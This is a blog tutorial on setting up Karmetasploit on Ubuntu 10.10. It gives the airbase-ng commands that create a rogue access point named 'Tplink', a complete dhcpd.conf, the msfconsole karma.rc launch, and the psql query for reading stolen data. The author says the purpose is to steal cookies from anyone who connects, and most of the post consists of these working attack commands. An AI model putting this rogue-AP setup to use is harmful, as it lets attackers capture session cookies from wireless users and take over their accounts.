Setting up Karmetasploit in Ubuntu 10.10


This is one old post that I have never written on after saving the draf on the link that teaches how to run Karmetasploit.  Basically, what we will be doing in this post is to run the Karmetasploit module and start sniffing cookies into our database.  In this post, we will look into the commands we type until we are able to sniff cookies using Karmetasploit.

airbase-ng -P -C 30 -v wlan0 -e "Tplink"
ifconfig at0 up 192.168.2.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
ifconfig wlan0 mtu 1800

ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

/etc/init.d/dhcp3-server start

msfconsole -r karma.rc

This are my setup commands to get karmetasploit to fully function on my machine. It means that you must have airbase-ng fully up and running and msfconsole to be readily used. Another thing you would require would be the dhcpd.conf file configurations. If you don’t already know how to setup one, here’s mine and it is usable with the command above.

/etc/dhcp3/dhcpd.conf

option domain-name-servers 192.168.2.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;

subnet 192.168.2.0 netmask 255.255.255.0 {
  range 192.168.2.2 192.168.2.254;
  option routers 192.168.2.1;
  option subnet-mask 255.255.255.0;
  option domain-name-servers 192.168.2.1;
}

You would generally be using 2 terminals, 1 running airbase-ng and 1 running metasploit. What you would see at the end of the day is airbase-ng creating an Access Point with the name Tplink. Up till the point where you type /etc/init.d/dhcp3-server start, you should be able to use other machines to connect to your Access Point.  When you connect, make sure the given IP from dhcp starts at 192.168.2.2, otherwise it means that dhcp was not configured correctly.  You would pretty much have trouble on this side most of the time.  Once you run the command msfconsole -r karma.rc, you are all set to sniff for cookies.  If you don’t have karma.rc, it is available here.

Once metasploit is running, use another machine to connect to the Access Point and try visiting google.com.  You should get a black html page and at the bottom of it keeps loading websites, where it is actually stealing cookies.  When your done loading that page, go back to your attack station and enter your database to check for the list of cookies you have sniffed.  Take a look here at how you can get the cookies.  I don’t use sql but postgres so I work differently to read the cookies I sniffed.

sudo -s
su postgres
psql msf_database_name
select * from notes;

Source: http://www.offensive-security.com/metasploit-unleashed/Karmetasploit_Configuration
Source: http://www.offensive-security.com/metasploit-unleashed/Karmetasploit_Attack_Analysis

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: